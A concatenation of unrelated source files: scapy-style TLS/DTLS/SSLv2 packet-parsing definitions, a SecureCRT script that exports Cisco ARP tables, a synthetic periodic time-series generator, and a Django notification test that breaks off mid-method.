                   FieldListField("elliptic_curves", None, ShortEnumField("elliptic_curve", None, TLS_EXT_ELLIPTIC_CURVES), length_from=lambda x:x.length),
                   ]
    def extract_padding(self, s):
        return '', s
class TLSExtHeartbeat(Packet):
    """heartbeat extension body: single mode byte (RFC 6520)."""
    name = "TLS Extension HeartBeat"
    fields_desc = [StrFixedLenField("mode", 0x01, 0x01)
                   ]
    def extract_padding(self, s):
        return '', s
class TLSClientHello(Packet):
    """ClientHello handshake body: version, client random (time + 28 bytes),
    session id, offered cipher suites and compression methods, extensions.
    Note: random defaults (time.time()/os.urandom) are sampled once at class
    definition, not per packet."""
    name = "TLS Client Hello"
    fields_desc = [XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   IntField("gmt_unix_time", int(time.time())),
                   StrFixedLenField("random_bytes", os.urandom(28), 28),
                   XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
                   StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
                   XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
                   FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),
                   XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),
                   FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),
                   XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
                   PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
                   ]
class TLSServerHello(Packet):
    """ServerHello handshake body: the single chosen cipher suite and
    compression method (vs. the lists offered in ClientHello)."""
    name = "TLS Server Hello"
    fields_desc = [XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   IntField("gmt_unix_time", int(time.time())),
                   StrFixedLenField("random_bytes", os.urandom(28), 28),
                   XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
                   StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
                   XShortEnumField("cipher_suite", 0x0000, TLS_CIPHER_SUITES),
                   ByteEnumField("compression_method", 0x00, TLS_COMPRESSION_METHODS),
                   XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
                   PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
                   ]
class TLSAlert(Packet):
    """Alert protocol message: severity level + description code."""
    name = "TLS Alert"
    fields_desc = [ByteEnumField("level", 0xff, TLS_ALERT_LEVELS),
                   ByteEnumField("description", 0xff, TLS_ALERT_DESCRIPTIONS),
                   ]
class TLSHeartBeat(Packet):
    """Heartbeat protocol message (RFC 6520): type, payload length, payload,
    padding."""
    name = "TLS Extension HeartBeat"
    fields_desc = [ByteEnumField("type", 0x01, {0x01:"request"}),
                   FieldLenField("length", None, length_of="data", fmt="H"),
                   StrLenField("data", "", length_from=lambda x:x.length),
                   # NOTE(review): length_from is expected to return an int, but
                   # this lambda returns the *string* 'P' * (16 - x.length) —
                   # looks like a bug (perhaps meant max(0, 16 - x.length));
                   # confirm before relying on padding dissection.
                   StrLenField("padding", "", length_from=lambda x: 'P' * (16 - x.length)),
                   ]
class TLSClientKeyExchange(Packet):
    """ClientKeyExchange header; the kex-specific parameters follow as payload."""
    name = "TLS Client Key Exchange"
    fields_desc = [ XBLenField("length", None, fmt="!H",) ]
class TLSServerKeyExchange(Packet):
    """ServerKeyExchange header; the kex-specific parameters follow as payload."""
    # BUG FIX: name previously read "TLS Client Key Exchange" (copy-paste from
    # TLSServerKeyExchange's sibling class), which mislabelled the layer in
    # show()/summary() output.
    name = "TLS Server Key Exchange"
    fields_desc = [ XBLenField("length", None, fmt="!H") ]
class TLSKexParamEncryptedPremasterSecret(Packet):
    """RSA key exchange parameter: the encrypted premaster secret (raw bytes)."""
    name = "TLS Kex encrypted PreMasterSecret"
    fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),
                    StrLenField("data", None) ]
class TLSKexParamDH(Packet):
    """Diffie-Hellman key exchange parameter blob (raw bytes)."""
    name = "TLS Kex DH Params"
    fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),
                    StrLenField("data", None) ]
class TLSFinished(Packet):
    """Handshake Finished message: opaque verify_data bytes."""
    name = "TLS Handshake Finished"
    fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),
                    StrLenField("data", None) ]
    def xbuild(self, master_secret, finished_label, hash_handshake_messages):
        '''
        Fill `data` with PRF-derived verify_data.
        master_secret
        finished_label = ['client finished','server finished']
        hash_handshake_messages
        '''
        self.data = ssl_tls_crypto.prf(master_secret, finished_label, hash_handshake_messages)
class TLSDHServerParams(Packet):
    """ServerKeyExchange DH parameters: p, g, server public value, signature —
    each a 2-byte-length-prefixed opaque blob."""
    name = "TLS Diffie-Hellman Server Params"
    fields_desc = [XFieldLenField("p_length", None, length_of="p", fmt="!H"),
                   StrLenField("p", '', length_from=lambda x:x.p_length),
                   XFieldLenField("g_length", None, length_of="g", fmt="!H"),
                   StrLenField("g", '', length_from=lambda x:x.g_length),
                   XFieldLenField("pubkey_length", None, length_of="pubkey", fmt="!H"),
                   StrLenField("pubkey", '', length_from=lambda x:x.pubkey_length),
                   XFieldLenField("signature_length", None, length_of="signature", fmt="!H"),
                   StrLenField("signature", '', length_from=lambda x:x.signature_length), ]
class TLSServerHelloDone(Packet):
    """ServerHelloDone handshake body (normally empty): 3-byte length + data."""
    name = "TLS Server Hello Done"
    fields_desc = [ XBLenField("length", None, fmt="!I", numbytes=3),
                    StrLenField("data", "", length_from=lambda x:x.length), ]
class TLSCertificate(Packet):
    """One certificate entry: 3-byte length + DER-encoded certificate bytes."""
    name = "TLS Certificate"
    fields_desc = [ XBLenField("length", None, length_of="data", fmt="!I", numbytes=3),
                    StrLenField("data", "", length_from=lambda x:x.length), ] # BERcodec_Object.dec(data,context=ASN1_Class_X509)
    def extract_padding(self,s):
        # NOTE(review): returns (s[length:], s[:length]) — order swapped relative
        # to the usual (keep, rest) convention used by TLSExtension above;
        # confirm this is intentional for walking the certificate list.
        return s[self.length:],s[:self.length]
class TLSCertificateList(Packet):
    """Certificate handshake body: 3-byte total length + list of TLSCertificate."""
    name = "TLS Certificate List"
    fields_desc = [
                   XBLenField("length", None, length_of="certificates", fmt="!I", numbytes=3),
                   PacketListField("certificates", None, TLSCertificate, length_from=lambda x:x.length),
                   ]
    def extract_padding(self,s):
        # Same swapped (rest, keep) ordering as TLSCertificate.extract_padding.
        return s[self.length:],s[:self.length]
class TLSChangeCipherSpec(Packet):
    """ChangeCipherSpec message: a single 0x01 byte."""
    name = "TLS ChangeCipherSpec"
    fields_desc = [ StrField("message", '\x01', fmt="H")]
class xTLSCiphertext(Packet):
    """Experimental ciphertext container with stubbed crypto hooks."""
    name = "TLS Ciphertext"
    fields_desc = [ StrField("data", None, fmt="H"),
                    StrField("mac", None, fmt="H")]
    def encrypt(self, record):
        # Stub: real MAC computation / encryption not implemented — just
        # serializes the record into `data`.
        # t = record[TLSRecord]
        # compute MAC
        # encrypt DATA+MAC
        self.data = str(record)
        return self
    def decrypt(self):
        # Stub: returns an empty record instead of decrypting.
        return TLSRecord()
class xTLSPlaintext(Packet):
    """Experimental plaintext container with a pluggable compression step."""
    name = "TLS Plaintext"
    fields_desc = [ StrField("data", None, fmt="H") ]
    # Encoder/decoder pairs keyed by compression method id.  Uses the Python 2
    # str codec 'zlib' (str.encode('zlib')); not available on Python 3.
    ptr_methods = {'default': {'encode': lambda x:x, # NULL
                               'decode': lambda x:x},
                   TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),
                                                  'decode': lambda x:x.decode('zlib')},
                   }
    def compress(self, method, data=None):
        # Unknown methods silently fall back to the identity 'default' codec.
        self.method = method
        data = data or self.data
        return TLSCompressed(self.ptr_methods.get(self.method, self.ptr_methods['default'])['encode'](data))
class xTLSCompressed(Packet):
    """Experimental compressed container; inverse of xTLSPlaintext.compress."""
    name = "TLS Compressed"
    fields_desc = [ StrField("data", None, fmt="H") ]
    ptr_methods = {'default': {'encode': lambda x:x,
                               'decode': lambda x:x},
                   TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),
                                                  'decode': lambda x:x.decode('zlib')},
                   }
    def decompress(self, method, data=None):
        self.method = method
        data = data or self.data
        return TLSRecord(self.ptr_methods.get(self.method, self.ptr_methods['default'])['decode'](data))
class DTLSRecord(Packet):
    """DTLS record header: TLS header plus 2-byte epoch and 6-byte sequence."""
    name = "DTLS Record"
    fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
                   XShortEnumField("version", 0x0301, TLS_VERSIONS),
                   ShortField("epoch", None),
                   XBLenField("sequence", None, fmt="!Q", numbytes=6),
                   XLenField("length", None, fmt="!H"), ]
class DTLSHandshake(Packet):
    """DTLS handshake header: TLS handshake header plus fragmentation fields."""
    name = "DTLS Handshake"
    fields_desc = TLSHandshake.fields_desc + [
                   ShortField("sequence", None),
                   XBLenField("fragment_offset", None, fmt="!I", numbytes=3),
                   XBLenField("length", None, fmt="!I", numbytes=3),
                   ]
class DTLSClientHello(Packet):
    """DTLS ClientHello handshake body: a TLS ClientHello plus the DTLS cookie
    used for HelloVerifyRequest-based DoS protection."""
    name = "DTLS Client Hello"
    fields_desc = [XShortEnumField("version", 0xfeff, TLS_VERSIONS),
                   IntField("gmt_unix_time", int(time.time())),
                   StrFixedLenField("random_bytes", os.urandom(28), 28),
                   XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
                   StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
                   XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),
                   StrLenField("cookie", '', length_from=lambda x:x.cookie_length),
                   XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
                   FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),
                   XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),
                   FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),
                   XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
                   # BUG FIX: was length_from=lambda x:x.extension_length — that
                   # field does not exist (it is declared as "extensions_length"
                   # above), so dissecting extensions raised AttributeError.
                   PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
                   ]
# SSLv2 certificate type codes.
SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}
class DTLSHelloVerify(Packet):
    """DTLS HelloVerifyRequest: server-issued cookie the client must echo."""
    name = "DTLS Hello Verify"
    fields_desc = [XShortEnumField("version", 0xfeff, TLS_VERSIONS),
                   XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),
                   StrLenField("cookie", '', length_from=lambda x:x.cookie_length),
                   ]
# SSLv2 record message type codes.
SSLv2_MESSAGE_TYPES = {0x01:'client_hello',
                       0x04: 'server_hello',
                       0x02: 'client_master_key'}
class SSLv2CipherSuite:
    '''
    make ciphersuites available as class props (autocompletion)
    SSLv2 cipher-kind codes are 3 bytes wide.
    '''
    DES_192_EDE3_CBC_WITH_MD5 = 0x0700c0
    IDEA_128_CBC_WITH_MD5 = 0x050080
    RC2_CBC_128_CBC_WITH_MD5 = 0x030080
    RC4_128_WITH_MD5 = 0x010080
    RC4_64_WITH_MD5 = 0x080080
    DES_64_CBC_WITH_MD5 = 0x060040
    RC2_128_CBC_EXPORT40_WITH_MD5 = 0x040080
    RC4_128_EXPORT40_WITH_MD5 = 0x020080
# Reverse lookup table: numeric SSLv2 cipher id -> name.
SSL2_CIPHER_SUITES = dict((v, k) for k, v in SSLv2CipherSuite.__dict__.items() if not k.startswith("__"))
class SSLv2Record(Packet):
    """SSLv2 record: 2-byte length with the MSB set as a header marker, then
    the message type byte (the adjust lambdas add/strip the marker and account
    for the type byte)."""
    name = "SSLv2 Record"
    fields_desc = [XBLenField("length", None, fmt="!H", adjust_i2m=lambda pkt, x: x + 0x8000 + 1, adjust_m2i=lambda pkt, x:x - 0x8000), # length=halfbyte+byte with MSB(high(1stbyte)) =1 || +1 for lengt(content_type)
                   ByteEnumField("content_type", 0xff, SSLv2_MESSAGE_TYPES),
                   ]
class SSLv2ClientHello(Packet):
    """SSLv2 ClientHello: all three lengths come first, then the three
    variable-length payloads in the same order."""
    name = "SSLv2 Client Hello"
    fields_desc = [
                   XShortEnumField("version", 0x0002, TLS_VERSIONS),
                   XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
                   XFieldLenField("session_id_length", None, length_of="session_id", fmt="H"),
                   XFieldLenField("challenge_length", None, length_of="challenge", fmt="H"),
                   FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),
                   StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
                   StrLenField("challenge", '', length_from=lambda x:x.challenge_length),
                   ]
# NOTE(review): duplicate of the SSLv2_CERTIFICATE_TYPES defined earlier in
# this module — harmless but redundant.
SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}
class SSLv2ServerHello(Packet):
    """SSLv2 ServerHello: flags and the three lengths first, then the
    variable-length certificate, cipher list and connection id."""
    name = "SSLv2 Server Hello"
    fields_desc = [
                   ByteEnumField("session_id_hit", 0x00, TLS_TYPE_BOOLEAN),
                   ByteEnumField("certificate_type", 0x01, SSLv2_CERTIFICATE_TYPES),
                   XShortEnumField("version", 0x0002, TLS_VERSIONS),
                   XFieldLenField("certificate_length", None, length_of="certificates", fmt="H"),
                   XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
                   XFieldLenField("connection_id_length", None, length_of="connection_id", fmt="H"),
                   StrLenField("certificates", '', length_from=lambda x:x.certificate_length),
                   FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),
                   StrLenField("connection_id", '', length_from=lambda x:x.connection_id_length),
                   ]
class SSLv2ClientMasterKey(Packet):
    """SSLv2 ClientMasterKey: chosen cipher kind plus the clear-key,
    encrypted-key and key-argument blobs, each with its own 2-byte length."""
    name = "SSLv2 Client Master Key"
    fields_desc = [
                   XBEnumField("cipher_suite", 0x0002, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), # fixme: 3byte wide
                   XFieldLenField("clear_key_length", None, length_of="clear_key", fmt="H"),
                   XFieldLenField("encrypted_key_length", None, length_of="encrypted_key", fmt="H"),
                   XFieldLenField("key_argument_length", None, length_of="key_argument", fmt="H"),
                   StrLenField("clear_key", '', length_from=lambda x:x.clear_key_length),
                   # BUG FIX: encrypted_key previously read its length from
                   # clear_key_length, mis-slicing the record whenever the two
                   # lengths differ; it must use encrypted_key_length.
                   StrLenField("encrypted_key", '', length_from=lambda x:x.encrypted_key_length),
                   StrLenField("key_argument", '', length_from=lambda x:x.key_argument_length),
                   ]
# entry class
class SSL(Packet):
    '''
    COMPOUND CLASS for SSL
    Dispatching container: inspects the underlayer / first byte to decide
    whether the stream is DTLS, SSLv2 or TLS, then parses it as a list of
    records of that flavour.
    '''
    name = "SSL/TLS"
    fields_desc = [PacketListField("records", None, TLSRecord)]
    def pre_dissect(self, s):
        # figure out if we're UDP or TCP
        if self.underlayer and self.underlayer.haslayer(UDP):
            self.guessed_next_layer = DTLSRecord
        elif ord(s[0]) & 0x80:
            # SSLv2 Header (MSB of the first length byte is set)
            self.guessed_next_layer = SSLv2Record
        else:
            self.guessed_next_layer = TLSRecord
        self.fields_desc = [PacketListField("records", None, self.guessed_next_layer)]
        return s
    def do_dissect(self, s):
        # Manually walk the byte stream, slicing out one record at a time and
        # appending each to self.records.
        pos = 0
        cls = self.guessed_next_layer # FIXME: detect DTLS
        cls_len = len(cls())
        try:
            while pos <= len(s):
                # consume payloads and add them to records list
                record = cls(s[pos:], _internal=1) # FIXME: performance
                layer_len = cls_len + record.length
                # NOTE(review): layer_len can only be None if record.length was
                # None, in which case the addition above would already have
                # raised — this check (and the "== None" spelling) looks dead.
                if layer_len == None:
                    break
                record = cls(s[pos:pos + layer_len])
                pos += layer_len
                # print pos,len(s)
                self.records.append(record)
        # Python 2 syntax; best-effort parse: stop on any truncated/malformed
        # trailing record instead of failing the whole dissection.
        except Exception, e:
            pass
            # raise e
        return s[pos:]
    def encrypt(self, master_secret):
        # Stub: record-layer encryption not implemented.
        pass
    def encrypt_stream(self):
        '''
        HMAC_hash(MAC_write_secret, seq_num + TLSCompressed.type +
                          TLSCompressed.version + TLSCompressed.length +
                          TLSCompressed.fragment));
        '''
        pass
    def decrypt(self, master_secret): pass
    def compress(self): pass
    def decompress(self): pass
# bind magic: register payload-guessing rules so scapy auto-dissects nested
# layers; the dicts give the header field values that select each payload.
bind_layers(TCP, SSL, dport=443)
bind_layers(TCP, SSL, sport=443)
bind_layers(UDP, SSL, dport=4433)
bind_layers(UDP, SSL, sport=4433)
# TLSRecord
bind_layers(TLSRecord, TLSChangeCipherSpec, {'content_type':0x14})
bind_layers(TLSRecord, TLSHeartBeat, {'content_type':0x18})
bind_layers(TLSRecord, TLSAlert, {'content_type':0x15})
bind_layers(TLSRecord, TLSHandshake, {'content_type':0x16})
# --> handshake proto
bind_layers(TLSHandshake, TLSClientHello, {'type':0x01})
bind_layers(TLSHandshake, TLSServerHello, {'type':0x02})
bind_layers(TLSHandshake, TLSCertificateList, {'type':0x0b})
bind_layers(TLSHandshake, TLSClientKeyExchange, {'type':0x10})
bind_layers(TLSHandshake, TLSServerKeyExchange, {'type':0x0c})
# NOTE(review): RFC 5246 defines handshake type finished as 0x14; 0x20 looks
# nonstandard — confirm against TLS_HANDSHAKE_TYPES.
bind_layers(TLSHandshake, TLSFinished, {'type':0x20})
# <---
# Both candidate key-exchange payloads are registered for each direction.
bind_layers(TLSServerKeyExchange, TLSKexParamEncryptedPremasterSecret)
bind_layers(TLSClientKeyExchange, TLSKexParamEncryptedPremasterSecret)
bind_layers(TLSServerKeyExchange, TLSKexParamDH)
bind_layers(TLSClientKeyExchange, TLSKexParamDH)
# --> extensions
bind_layers(TLSExtension, TLSServerNameIndication, {'type': 0x0000})
bind_layers(TLSExtension, TLSExtMaxFragmentLength, {'type': 0x0001})
bind_layers(TLSExtension, TLSExtCertificateURL, {'type': 0x0002})
bind_layers(TLSExtension, TLSExtECPointsFormat, {'type': 0x000b})
bind_layers(TLSExtension, TLSExtEllipticCurves, {'type': 0x000a})
# bind_layers(TLSExtension,Raw,{'type': 0x0023})
bind_layers(TLSExtension, TLSExtHeartbeat, {'type': 0x000f})
# <--
# DTLSRecord
bind_layers(DTLSRecord, DTLSHandshake, {'content_type':0x16})
bind_layers(DTLSHandshake, DTLSClientHello, {'type':0x01})
# SSLv2
bind_layers(SSLv2Record, SSLv2ServerHello, {'content_type':0x04})
bind_layers(SSLv2Record, SSLv2ClientHello, {'content_type':0x01})
bind_layers(SSLv2Record, SSLv2ClientMasterKey, {'content_type':0x02})
|
<reponame>tylersiemers/securecrt-tools<gh_stars>0
# $language = "python"
# $interface = "1.0"
import os
import sys
import logging
# Add script directory to the PYTHONPATH so we can import our modules (only if run from SecureCRT)
if 'crt' in globals():
    script_dir, script_name = os.path.split(crt.ScriptFullName)
    if script_dir not in sys.path:
        sys.path.insert(0, script_dir)
else:
    # Running outside SecureCRT (e.g. invoked directly with python): derive
    # the paths from this file instead of the crt object.
    script_dir, script_name = os.path.split(os.path.realpath(__file__))
# Now we can import our custom modules
from securecrt_tools import scripts
from securecrt_tools import utilities
# Create global logger so we can write debug messages from any function (if debug mode setting is enabled in settings).
logger = logging.getLogger("securecrt")
logger.debug("Starting execution of {0}".format(script_name))
# ################################################ SCRIPT LOGIC ###################################################
def script_main(session):
    """
    | SINGLE device script
    | Author: <NAME>
    | Email: <EMAIL>

    This script will capture the ARP table of the attached device and output the results as a CSV file. While this
    script can be used to capture the ARP table, the primary purpose is to create the ARP associations that the
    "s_switchport_mapping.py" script can use to map which MAC and IP addresses are connected to each device.

    :param session: A subclass of the sessions.Session object that represents this particular script session (either
                SecureCRTSession or DirectSession)
    :type session: sessions.Session
    """
    # Get script object that owns this session, so we can check settings, get textfsm templates, etc
    script = session.script
    # Start session with device, i.e. modify term parameters for better interaction (assuming already connected)
    session.start_cisco_session()
    # Validate device is running a supported OS
    session.validate_os(["IOS", "NXOS"])
    # Prompt for the VRF; an empty answer means the default VRF (represented as None).
    selected_vrf = script.prompt_window("Enter the VRF name.\n(Leave blank for default VRF)")
    if selected_vrf == "":
        selected_vrf = None
    logger.debug("Set VRF to '{0}'".format(selected_vrf))
    # Select command and TextFSM template file based on network OS
    if session.os == "IOS":
        send_cmd = "show ip arp"
        template_file = script.get_template("cisco_ios_show_ip_arp.template")
    else:
        send_cmd = "show ip arp detail"
        template_file = script.get_template("cisco_nxos_show_ip_arp_detail.template")
    logger.debug("Command set to '{0}'".format(send_cmd))
    # If a VRF was specified, update the command and the output filename (via
    # the hostname) to reflect it.
    if selected_vrf:
        send_cmd = send_cmd + " vrf {0}".format(selected_vrf)
        script.hostname = script.hostname + "-VRF-{0}".format(selected_vrf)
        logger.debug("Updated hostname to: '{0}'".format(script.hostname))
    # Get "show ip arp" data
    raw_arp = session.get_command_output(send_cmd)
    # Process with TextFSM
    logger.debug("Using template: '{0}'".format(template_file))
    fsm_results = utilities.textfsm_parse_to_list(raw_arp, template_file, add_header=True)
    # Generate filename and output data as CSV
    output_filename = session.create_output_filename("arp", ext=".csv")
    utilities.list_of_lists_to_csv(fsm_results, output_filename)
    # Return terminal parameters back to the original state.
    session.end_cisco_session()
# ################################################ SCRIPT LAUNCH ###################################################
# If this script is run from SecureCRT directly, use the SecureCRT specific class
# (SecureCRT's embedded interpreter runs scripts with __name__ == "__builtin__").
if __name__ == "__builtin__":
    # Initialize script object
    crt_script = scripts.CRTScript(crt)
    # Get session object for the SecureCRT tab that the script was launched from.
    crt_session = crt_script.get_main_session()
    # Run script's main logic against our session
    script_main(crt_session)
    # Shutdown logging after
    logging.shutdown()
# If the script is being run directly, use the simulation class
elif __name__ == "__main__":
    # Initialize script object
    direct_script = scripts.DebugScript(os.path.realpath(__file__))
    # Get a simulated session object to pass into the script.
    sim_session = direct_script.get_main_session()
    # Run script's main logic against our session
    script_main(sim_session)
    # Shutdown logging after
    logging.shutdown()
|
<gh_stars>0
###########################
# Latent ODEs for Irregularly-Sampled Time Series
# Author: <NAME>
###########################
# Create a synthetic dataset
from __future__ import absolute_import, division
from __future__ import print_function
import os
import matplotlib
# Select the matplotlib backend before pyplot is imported: interactive TkAgg
# on the author's machine, headless Agg everywhere else (servers / CI).
if os.path.exists("/Users/yulia"):
    matplotlib.use("TkAgg")
else:
    matplotlib.use("Agg")
import numpy as np
import numpy.random as npr
from scipy.special import expit as sigmoid
import pickle
import matplotlib.pyplot as plt
import matplotlib.image
import torch
import lib.utils as utils
# ======================================================================================
def get_next_val(init, t, tmin, tmax, final=None):
    """Linearly ramp from *init* toward *final* over [tmin, tmax].

    Returns ``init`` unchanged when *final* is None (constant parameter);
    otherwise returns ``init + slope * t`` where the slope spans the full
    time range.
    """
    if final is None:
        return init
    slope = (final - init) / (tmax - tmin)
    return init + slope * t
def generate_periodic(
    time_steps,
    init_freq,
    init_amplitude,
    starting_point,
    final_freq=None,
    final_amplitude=None,
    phi_offset=0.0,
):
    """Generate one noiseless sinusoidal trajectory sampled at *time_steps*.

    Amplitude and frequency drift linearly from their init_* values toward
    the final_* values (constant when a final value is None).  Returns an
    array of shape (len(time_steps), 2) with rows [t, value].
    """
    t_lo = time_steps.min()
    t_hi = time_steps.max()
    samples = []
    phase = phi_offset
    prev_t = time_steps[0]
    for cur_t in time_steps:
        amplitude = get_next_val(init_amplitude, cur_t, t_lo, t_hi, final_amplitude)
        frequency = get_next_val(init_freq, cur_t, t_lo, t_hi, final_freq)
        # Integrate the instantaneous frequency over the step to get the phase.
        phase = phase + 2 * np.pi * frequency * (cur_t - prev_t)
        samples.append([cur_t, amplitude * np.sin(phase) + starting_point])
        prev_t = cur_t
    return np.array(samples)
def assign_value_or_sample(value, sampling_interval=(0.0, 1.0)):
    """Return *value* unchanged, or a uniform random draw when it is None.

    :param value: a concrete parameter value, or None to request sampling.
    :param sampling_interval: (low, high) bounds for the uniform draw.
    :returns: *value*, or a float sampled uniformly from [low, high).
    """
    # BUG FIX (best practice): the default was the mutable list [0.0, 1.0],
    # shared across all calls; a tuple default is immutable and equivalent.
    if value is not None:
        return value
    low, high = sampling_interval[0], sampling_interval[1]
    return np.random.random() * (high - low) + low
class TimeSeries:
    """Base class for synthetic time-series generators.

    Holds the torch device used for generated tensors, an (optional) initial
    state ``z0``, and shared plotting / noise-injection helpers.
    """

    def __init__(self, device=torch.device("cpu")):
        self.device = device
        self.z0 = None

    def init_visualization(self):
        """Open a wide white matplotlib figure for trajectory plots."""
        self.fig = plt.figure(figsize=(10, 4), facecolor="white")
        self.ax = self.fig.add_subplot(111, frameon=False)
        plt.show(block=False)

    def visualize(self, truth):
        """Plot a trajectory given as rows of [time, value]."""
        self.ax.plot(truth[:, 0], truth[:, 1])

    def add_noise(self, traj_list, time_steps, noise_weight):
        """Return a noisy copy of *traj_list*, leaving the first step exact.

        Uniform noise in [0, noise_weight) is added to every time step except
        the first; the input tensor itself is not modified.
        """
        num_traj = traj_list.size(0)
        num_noisy_steps = len(time_steps) - 1  # first point stays noise-free
        perturbation = np.random.sample((num_traj, num_noisy_steps))
        perturbation = torch.Tensor(perturbation).to(self.device)
        noisy = traj_list.clone()
        # NOTE(review): the original comment called channel 0 the "time
        # dimension", yet noise is added to [:, 1:, 0] — confirm the intended
        # channel; behavior is preserved here as-is.
        noisy[:, 1:, 0] += noise_weight * perturbation
        return noisy
class Periodic_1d(TimeSeries):
    """1-D sinusoid generator with optionally drifting frequency/amplitude;
    inherits device handling and noise injection from TimeSeries."""
    def __init__(
        self,
        device=torch.device("cpu"),
        init_freq=0.3,
        init_amplitude=1.0,
        final_amplitude=10.0,
        final_freq=1.0,
        z0=0.0,
    ):
        """
        If some of the parameters (init_freq, init_amplitude, final_amplitude, final_freq) is not provided, it is randomly sampled.
        For now, all the time series share the time points and the starting point.
        """
        super(Periodic_1d, self).__init__(device)
        self.init_freq = init_freq
        self.init_amplitude = init_amplitude
        self.final_amplitude = final_amplitude
        self.final_freq = final_freq
        self.z0 = z0
    def sample_traj(
        self, time_steps, n_samples=1, noise_weight=1.0, cut_out_section=None
    ):
        """
        Sample periodic functions.
        Returns a tensor of n_samples noisy trajectories evaluated at
        time_steps; parameters set to None at construction are re-sampled
        per trajectory via assign_value_or_sample.
        """
        traj_list = []
        for i in range(n_samples):
            init_freq = assign_value_or_sample(self.init_freq, [0.4, 0.8])
            if self.final_freq is None:
                final_freq = init_freq
            else:
                final_freq = assign_value_or_sample(self.final_freq, [0.4, 0.8])
            init_amplitude = assign_value_or_sample(self.init_amplitude, [0.0, 1.0])
            final_amplitude = assign_value_or_sample(self.final_amplitude, [0.0, 1.0])
            # Jitter the shared starting point per trajectory.
            noisy_z0 = self.z0 + np.random.normal(loc=0.0, scale=0.1)
            traj = generate_periodic(
                time_steps,
                init_freq=init_freq,
                init_amplitude=init_amplitude,
                starting_point=noisy_z0,
                final_amplitude=final_amplitude,
                final_freq=final_freq,
            )
            # Cut the time dimension (keep only the value column).
            traj = np.expand_dims(traj[:, 1:], 0)
            traj_list.append(traj)
        # shape: [n_samples, n_timesteps, 2]
        # traj_list[:,:,0] -- time stamps
        # traj_list[:,:,1] -- values at the time stamps
        traj_list = np.array(traj_list)
        traj_list = torch.Tensor().new_tensor(traj_list, device=self.device)
        traj_list = traj_list.squeeze(1)
        traj_list = self.add_noise(traj_list, time_steps, noise_weight)
        return traj_list
|
from unittest.mock import patch
from django.contrib.auth import get_user_model
from django.test import TestCase
from ohq.models import Course, Membership, Question, Queue, Semester
from ohq.tasks import sendUpNextNotificationTask
User = get_user_model()
@patch("ohq.tasks.sendUpNextNotification")
class sendUpNextNotificationTaskTestCase(TestCase):
    """Tests for the sendUpNextNotificationTask task.

    The underlying notification helper is patched out for the whole class and
    injected into each test method as ``mock_send``.
    """

    def setUp(self):
        self.semester = Semester.objects.create(year=2020, term=Semester.TERM_SUMMER)
        self.course = Course.objects.create(
            course_code="000", department="Penn Labs", semester=self.semester
        )
        self.queue = Queue.objects.create(name="Queue", course=self.course)
        self.ta = User.objects.create(username="ta")
        # Four students, each enrolled in the course with one open question.
        students = [
            User.objects.create(username="student_{}".format(ordinal))
            for ordinal in ("one", "two", "three", "four")
        ]
        self.student_one, self.student_two, self.student_three, self.student_four = students
        Membership.objects.create(course=self.course, user=self.ta, kind=Membership.KIND_TA)
        for student in students:
            Membership.objects.create(
                course=self.course, user=student, kind=Membership.KIND_STUDENT
            )
        for number, student in enumerate(students, start=1):
            Question.objects.create(
                queue=self.queue, asked_by=student, text="Q{}".format(number)
            )

    def test_small_queue(self, mock_send):
        """
        No notification is sent when fewer than 3 questions are in the queue.
        """
        Question.objects.all().first().delete()
        Question.objects.all().first().delete()
        sendUpNextNotificationTask.s(self.queue.id).apply()
        mock_send.assert_not_called()

    def test_should_not_send(self, mock_send):
        """
        No notification is sent when the 3rd question is not flagged for one.
        """
        sendUpNextNotificationTask.s(self.queue.id).apply()
        mock_send.assert_not_called()

    def test_not_verified(self, mock_send):
        """
        No notification is sent when the asker of the 3rd question has not
        verified (or added) a phone number.
        """
        question = Question.objects.get(asked_by=self.student_three)
        question.should_send_up_soon_notification = True
        question.save()
        sendUpNextNotificationTask.s(self.queue.id).apply()
        mock_send.assert_not_called()

    def test_send(self, mock_send):
        """
